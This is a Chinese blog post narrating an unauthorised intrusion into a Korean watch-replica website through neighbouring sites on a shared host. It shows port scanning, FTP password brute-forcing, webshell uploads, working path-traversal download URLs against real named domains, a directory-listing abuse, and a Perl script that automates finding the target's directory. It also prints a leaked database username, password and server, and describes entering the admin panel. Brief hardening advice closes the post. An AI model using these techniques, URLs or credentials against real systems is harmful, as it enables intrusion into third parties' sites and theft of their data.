对韩国某手表网站的一次偶然安全检测
韩国是美国的小弟,俺是安全爱好者,看到网站就想看看该网站的安全做的如何,当我浏览网站产品时,如果要查看详细情况时,都会自动跳转到登录页面。如图2所示,仅仅查看而已,都要登录,有这个必要吗?到底它网站的安全性如何呢?http://images.51cto.com/files/uploadimg/20081104/163830926.jpg
图2跳转后的登录界面
一、信息收集
1.获取IP地址
首先打开DOS窗口,然后使用“ping XXX.net”获取该网站的真实IP地址,如图3所示,通过ping命令知道该主机应该采取了一些安全措施,丢包率比较高,应该是禁止进行ping等命令。
链接标记http://images.51cto.com/files/uploadimg/20081104/163845179.jpg
图3 获取真实IP地址
2.使用superscan探测端口
请出俺的扫描工具——superscan,使用supersan3.0扫了一下IP地址为“XX.XX.85.96”的端口开放情况,如图4所示,发现只开了21,22,80端口,从端口开放情况来看,对外提供服务仅仅21和80端口,感觉安全应该还可以,只能从Web和Ftp来入手。
链接标记http://images.51cto.com/files/uploadimg/20081104/163910321.jpg
图4情况开放情况
3.Ftp口令扫描
使用一些Ftp口令扫描工具对该IP地址扫描,使用了多个字典进行扫描,均未成功,看来Ftp口令扫描攻击方法不行。
说明:
一般站点都会开放Ftp服务,Ftp服务主要用来上传程序等,一般默认会设置在Web目录,因此一旦获取了Ftp口令,就可以跟用户一样“正常”使用Ftp来上传和下载Web程序,通过上传Webshell或者获取数据库等方式来进行渗透和控制。
二、检查SQL注入攻击点
1.寻找注入点
先手动对该网站地址进行SQL注入点的检测,在地址后加入“’”、“or”等,例如在地址栏中分别输入:链接标记http://XXX.net/goods/content.asp?big=3&middle=12&small=1&num=30967’后回车,在地址栏中会自动变成“链接标记http://rolexcopy.net/goods/content.asp?big=3&middle=12&small=1&num=30967%20and%201=1”,如图5所示,
链接标记http://images.51cto.com/files/uploadimg/20081104/163926236.jpg
图5 出现SQL错误提示
虽然手动检测结果提示为SQL错误,当后面使用一些脚本测试,没有找到明显的SQL注入点,使用HDSI等工具进行探测的结果也显示无注入点,说明暂时找不到注入点。
2.寻找上传地址
通过是使用Flashget以及digshell挖掘鸡等工具对该网站进行上传地址搜索和检查,在链接标记http://xxx.net/other/contact_us.asp这个页面找到一个上传,但不能上传asp、asa等可以提升权限的文件类型。
3.旁注信息搜集
既然正面不能突破,那么就从侧面,通过旁注来看看可否获取该网站的Webshell。打开链接标记http://www.myipneighbors.com/ 输入XXX.net后发现同一服务器下一共有226个站,如图6所示。
链接标记http://images.51cto.com/files/uploadimg/20081104/164425298.jpg
图6同一服务器下的存在的网站
说明:
链接标记http://www.myipneighbors.com/ 是一个通过IP地址或者域名来获取该IP地址或者域名所在服务器中所存在的其它网站地址。它是一个旁注的辅助工具,当然在明小子Domain3.5以及其它一些工具软件中也有这个功能。
既然在该IP地址上有226个网站,那就从其它网站入手吧。
4.尝试对其它站点进行渗透
对剩下的225个网站随机进行SQL注入点探测,随机选中一个网站“hansincar.cafe24.com”,从中找到一个可上传的地方,可以直接上传文件,将本地的一个Webshell文件上传到该站点,上传文件成功后,asp木马却无法运行,如图7所示。
链接标记http://images.51cto.com/files/uploadimg/20081104/164003770.jpg
图7无权限运行asp木马
看来该站点无法找到突破点,那就选择下一个网站进行探测吧。后面我对多个站点进行了SQL注入探测和寻找文件上传地址。通过探测虽然很多网站存在注入点,但都是public权限,无法备份得shell;即使成功进入后台后,有上传的地方,上传后还是没有运行脚本的权限。
说明管理员对该主机采取了严格的基于网站用户角色的安全权限策略,安全设置比较变态,对每个可上传的目录做了限制,仅对已知文件脚本类型运行,而禁止对其它脚本运行,各个网站之间安全先对独立。
三、获取突破点
1.任意下载文件
在我即将要放弃安全测试时,在打开链接标记http://nowmotors.com/bbs/content ... =164&bid=used01页面时,发现可以有下载的地方,而下载的参数就是一个文件,如果没有做限制的话,那就可以下载任何文件!如图8所示。
链接标记http://images.51cto.com/files/uploadimg/20081104/164039139.jpg
图8下载文件页面
2.获取上传文件地址
通过测试发现该上传页面可以上传任何文件,而在对另一网站注入时,也得到了网站的绝对路径(F:\HOME\HANSINCAR\WWW\HELPDESK\../board/inc/view.asp),如图9所示。
链接标记http://images.51cto.com/files/uploadimg/20081104/164054405.jpg
图9获取网站的绝对路径
3.推测网站绝对路径
通过观察,可以知道在该服务器上每个网站的绝对路径就是“F:\用户名\WWW\”,于是可以构造一个地址下载网站中的源程序:链接标记http://nowmotors.com/bbs/filedow ... w/goods/submain.asp
说明:
(1)打算下载链接标记http://XXX.net/goods/submain.asp文件(这里说明一下,因为down默认检查文件名的目录是DEXTUpload/editor/中,查看图片的属性就知道了,所以要"../../"返回网站的根目录),但发现却无法下载,如图10所示。
链接标记http://images.51cto.com/files/uploadimg/20081104/164108656.jpg
图10无法下载源文件
(2)分析不能下载原因
难道真的做了限制,还是权限问题?还是其它,nowmotors.com网站肯定存在上传漏洞,更换一个网站进行测试:
链接标记http://nowmotors.com/bbs/filedown.asp?filename=../../../../hansincar/www/board/inc/view.asp
发现可以下载,如图11所示。
链接标记http://images.51cto.com/files/uploadimg/20081104/164238964.jpg
图11正常下载nowmotors.com网站文件
但为什么不能下载XXX.net网站中的文件呢,该网站中的submain.asp是存在的,那只有一种可能——用户名XXX不存在。
(3)获取网站的真正用户名
怎么找到此网站的用户名呢?一个好的办法就是通过网站域名注册信息来获取用户的网站用户名,通过whois.domaintools.com来获取
XXX.net网站域名注册信息,如图12所示。
链接标记http://images.51cto.com/files/uploadimg/20081104/164250229.jpg
图12获取rolexcopy的域名注册信息
(4)下载仍然失败
于是尝试将原来的用户名更换为“tmdgus022”和“tmdgus”,进行测试:链接标记http://nowmotors.com/bbs/filedown.asp?filename=../../../../tmdgus022/www/goods/submain.asp 链接标记http://nowmotors.com/bbs/filedown.asp?filename=../../../../tmdgus/www/goods/submain.asp
测试结果都显示找不到文件,看来通过该方法仍然无法下载源文件。
四、新的转机
1.动手构建获取网站用户名的程序
现在的问题就是要找到网站对应的用户名。在某一网站后台,发现有可以列目录。
却跳不出该网站的根目录(在根目录时,“../”是不可点击),不可点击,那可以构造URL跳出,于是先看点击返回上一级目录时跳转到的URL,
于是找到处理该JS的代码,如下:
function page_link(FormName, InputName, f_prev, r_name, r_folder, l_folder, last) {
var targetSTR;
targetSTR = "dir.asp?FormName="+FormName+"&InputName=
"+InputName+"&f_location="+f_prev;
targetSTR = targetSTR+"&r_location="+r_name+"&r_folder=
"+r_folder+"&l_folder="+l_folder+"&last="+last;
window.location.href = targetSTR;
}
原来跳转到pop_directory.asp,其它参数都不重要,最重要的是f_location这个参数,
于是先测试c1saju.com网站,在浏览器中输入:
链接标记http://c1saju.com/admin/inc/pop_directory.asp?FormName=all&f_location=&last=ok
列出了当前网站的根目录,如图13所示。
链接标记http://images.51cto.com/files/uploadimg/20081104/164305690.jpg
图13 使用js文件列c1saju.com网站根目录
2.获取根目录用户名称
如果要返回到F:\home就要构造URL:
链接标记http://c1saju.com/admin/inc/pop_directory.asp?FormName=all&f_location=../../&last=ok因为网站的根目录在F:\home\***\www下,发现还是pop_directory.asp的文件还是在网站的根目录下,难道说不能跳出?再仔细看了下“../../”不是刚好返回到网站根目录吗,因为pop_directory.asp文件在F:\home\***\www\admin\inc\目录下,于是重新构造URL
链接标记http://c1saju.com/admin/inc/pop_directory.asp?FormName=all&f_location=../../../../&last=ok
终于跳到F:\home目录中了,全部的用户名都出来了,如图14所示。
链接标记http://images.51cto.com/files/uploadimg/20081104/164318699.jpg
图14列出home目录所有用户
3.动手编写find.pl脚本自动获取用户
下面的工作就简单了,就是一个个文件夹点进去,看那个是目录目标网站(链接标记http://XXX.net/),然后就再构造URL下载就行了,但200多个站,一个个看,那不是很累?于是想出来偷懒的方法,写个脚本来自己找吧,先把网站全部用户复制下来,保存到user.txt文件中,再分析目标站点登录界面源代码,发现网站admin/image目录下有个admin_bk.gif文件,将其作为识别特征,也就是说只要我列出每个admin/image目录中目录下发现有admin_bk.gif文件,说明就可能是目标网站了。Find.pl的脚本源代码如下:
use LWP;
use HTTP::Cookies;
use HTTP::Request::Common qw(POST);
my $ua=new LWP::UserAgent;
$ua->agent('Mozilla/5.0');
$ua->cookie_jar(new HTTP::Cookies);
open(FILE,"user.txt") || die ("Could not open file");
my @arr=;
for my $line (@arr) {
chomp $line;
any($line);
}
sub any {
print "分析$_\n";
my $url="链接标记http://c1saju.com/admin/inc/pop_directory.asp?
FormName=all&InputName=ji_AbsFolder&f_location=../../../../$_
/www/admin/image&r_location=../../../../&r_folder=
$_/www/admin/image&l_folder=admin&last=";
my ($content, $status, $is_success) = do_GET($url);
if ($content =~ m/pop_directory.asp/) {
next;
}elsif ($content =~ m/admin_bk.gif/) {
ok($_);
}
}
sub do_GET {
$browser = LWP::UserAgent->new unless $browser;
my $resp = $browser->get(@_);
return ($resp->content, $resp->status_line, $resp->is_success, $resp)
if wantarray;
return unless $resp->is_success;
return $resp->content;
}
sub ok {
open(FILE1,">>e:/perl/0k.txt") || die ("Could not open file");
print FILE1 "$_\r\n";
close(FILE1);
}
在本地运行一下find.pl,等待一分钟左右再打开ok.txt,在该文件中发现有多个用户名
注意:
如果选好过滤的文件为admin_bk.gif,就不会出现那么多用户名了。
4. 获取rolexcopy.net网站的真实目录
通过在浏览器中对find.pl找到的ok.txt结果进行查看,当找到mykom.cafe24.com,发现和网站链接标记http://XXX.net/一摸一样,XXX.net网站的目录就是“mykom”目录,如图15所示。
链接标记http://images.51cto.com/files/uploadimg/20081104/164334325.jpg
图15获取rolexcopy.net网站的真实目录mykom
5.下载数据库文件
通过分析该网站目录,找到数据库配置文件dbconfig.asp,通过nowmotors.com网站的文件下载漏洞将其下载到本地:
链接标记http://nowmotors.com/bbs/filedown.asp?filename=../../../../mykom/www/dbconfig.asp
成功下载,打看看,得到了用户名和密码。
db_name = "mykom"
db_id = "mykom"
db_pass = "parksu7616"
db_domain = "sql-007.cafe24.com"
在本地用webshell连接一下远程数据库,得到管理员用户名和密码,如图16所示,管理员对应的密码为名为,省去破解md5密码值了。
链接标记http://images.51cto.com/files/uploadimg/20081104/164346549.jpg
图16 使用本地rootkit.asp获取用户名和密码
6.进入管理后台
在后台直接输入获取的用户名和密码登录,如图17所示,成功进入后台,由于俺不是哈韩族,也不认识几个韩文,检查到此为止! 链接标记http://images.51cto.com/files/uploadimg/20081104/164357112.jpg
图17成功进入rolexcopy.net网站管理后台
五、安全防范措施
就本此渗透过程来看,网站的安全已经设置的比较到位了,但是由于程序中的漏洞,导致了本次渗透成功,因此从安全防范的措施来说,建议就如下方面进行安全加固:
(1)严格过来脚本
对于可下载任意文件这个漏洞,不少网站都存在,后果也很严重,其实最简单的方法就是把filename参数里的”../”过滤掉就OK了。
(2)涉及用户登录模块,一定要对密码进行加密,而且建议采取一些经过变换的md5加密。
(3)重新审查程序中SQL注入漏洞和XSS漏洞,本此检查未对XSS进行检查,但该服务器下多个网站存在SQL注入漏洞,因此也是安全的一个隐患。
六、总结与体会
本次从检测上来说,并没有什么新的检测技术,都是一些老技术。本次检测的亮点就是自己动手编写了一个搜索脚本,自动获取管理用户目录;同时也说明在注入时代,不通过过注入,也一样可以拿到一个网站后台。最后需要提一下perl语言,它真是个好的语言,特别是处理一些重复的网页问题时,可以让我们减少很多重复性的工作,在入侵过程可以起到事半功倍的效果。
页:
[1]